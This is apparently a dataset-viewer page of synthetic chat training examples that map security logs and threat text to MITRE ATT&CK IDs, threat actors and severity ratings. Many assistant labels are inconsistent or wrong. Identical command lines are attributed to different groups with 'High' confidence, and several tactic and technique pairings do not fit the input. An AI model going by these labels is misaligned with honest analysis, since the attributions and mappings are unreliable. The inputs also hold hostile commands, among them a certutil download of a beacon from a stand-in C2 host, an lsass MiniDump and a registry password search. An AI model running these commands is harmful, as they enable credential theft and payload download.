messages listlengths 2 2 |
|---|
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.161.181.200",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-QQJBA7GQW7)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Command and Control, Exfiltration",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1104 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.152.81.152",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA000... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Its purpose is to load Msadoz<n>.dll in order to decrypt and execute it in memory",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1332 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.141.179.156",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0008\", \"TA000... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Access to remote services may be used as a redundant or persistent access mechanism during an operation.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}",
"role": "... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion.",
"role": "user"
},
{
"content": "{\"tactics\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3043 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-9WCWM4JTC8)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-MHI31QYVFJ)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 871 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confiden... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3054 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 539 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-EKIKPW1457)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence, Privilege Escalation, Impact",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-B9Q2YXFKIE)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Credential Access",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.",
"role": "user"
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2393 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: POSHSPY uses a WMI event subscription to establish persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.003\", \"T1546\"]}",
"role": "assista... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: It can be disabled through GPO: Computer Configuration > [Policies] > Administrative Templates > Windows Components > Credential User Interface: Enumerate administrator accounts on elevation.",
"role": "user"
}... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-ZP4W16NOSS)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Collection",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hig... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Malicious document used by Tropic Trooper PDB Strings as Context Clues The MSI file has two program database (PDB) strings inside: one belonging to the MSI file, and another for the backdoor installer (detected by Trend Mi... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: KeyBoy uses -w Hidden to conceal a PowerShell window that downloads a payload.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564.003\", \"T1564\"]}",
"role": "assistant"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: reg query HKLM /f password /t REG_SZ /s",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.51.165.7",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1484.... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1213\", \"T1213.002... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 759 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"Hig... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-2JM42LIUVY)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Initial Access",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.106.170.186",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Sp... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.58.232.187",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}",
"role":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-36W2M5J7K4)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Credential Access, Discovery",
"role": "user"
},
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1046\"]}",
"role": "assistant"
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Linux and macOS implementations of SMB typically use Samba.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.",
"role": "user"
},... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-ZOEL1MQ6X1)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Command and Control",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typh... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-0GPH0I5VMF)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may also deceive users into performing actions such as enabling Remote Access Software, allowing direct control of the system to the adversary, or downloading and executing malware for User Execution.",
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Actions may be related to network and system information Discovery, Collection, or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.",
"role": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-7QLZ0AFXBB)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Initial Access, Reconnaissance",
"role": "user"
},
{
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.190.8.97",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0003\", \"TA0043\"], \"tec... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-IZGKA8ZIAH)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Initial Access",
"role": "user"
},
{
"conte... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.149.209.15",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"te... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.52.31.91",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\", \"TA0008... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 635 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.80.54.209",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0007\"], \... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Okrum can collect the victim username.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.17.58.187",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-SD8FBC76CM)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Defense Evasion",
"role": "user"
},
{
... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: eventvwr.exe can auto-elevate and execute a specified binary or script.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1548.002\", \"T1548\"]}",
"role": ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT18 actors deleted tools and batch files from victim systems.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-DFCVZN1HGY)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\": \"Ext... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.41.163.69",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1566.001... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Data is exchanged via HTTP POSTs.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-U63ZQC0ZIK)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"High... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Torisma can use HTTP and HTTPS for C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: load additional modules",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2045 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-1S8O9XB060)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Initial Access, Execution",
"role": "user"
},
{
"content... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role":... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 643 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.6.66.6",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0005\", \"TA0... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for changes made to windows registry keys and/or values that may abuse the Windows service control manager to execute malicious commands or payloads.",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Bundlore can execute JavaScript by injecting it into the victim's browser.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.007\", \"T1059\"]}",
"role": "assistan... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.98.78.81",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techni... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3249 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.176.0.2",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1546.00... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: looks for net and account or domain in close proximity",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.110.245.14",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA000... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.",
"role... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-1P46F4LT7E)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Reconnaissance",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-J8PVHEJT12)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Execution",
"role": "user"
},
{
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.36.232.31",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0009\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-ZNXKH0R4BB)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration, Credential Access, Impact",
"role": "user"
},
{
"content"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \"H... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-SH93RGYU5T)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Collection, Impact",
"role": "user"
},
{
"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1347 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-XYP5WCBA9Y)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery, Persistence",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.65.47.235",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confi... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.56.204.65",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0007\"]... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-DPBWT4Y4VR)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact, Credential Access, Defense Evasion",
"role": "user"
},
{
"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.0.176.45",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0002\", \"TA0... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Hydraq C2 traffic is encrypted using bitwise NOT and XOR operations.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2513 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.122.5.125",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0002\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confi... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: TA551 has used a DGA to generate URLs from executed macros.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568\", \"T1568.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1125 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.12.55.208",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0004\"], \"techniques\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-Z1TMT697HP)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Exfiltration",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 922 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.0.31.138",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0040\", \"TA00... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055\"]}",
"rol... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-K64CYGOK4F)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"High\", \... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.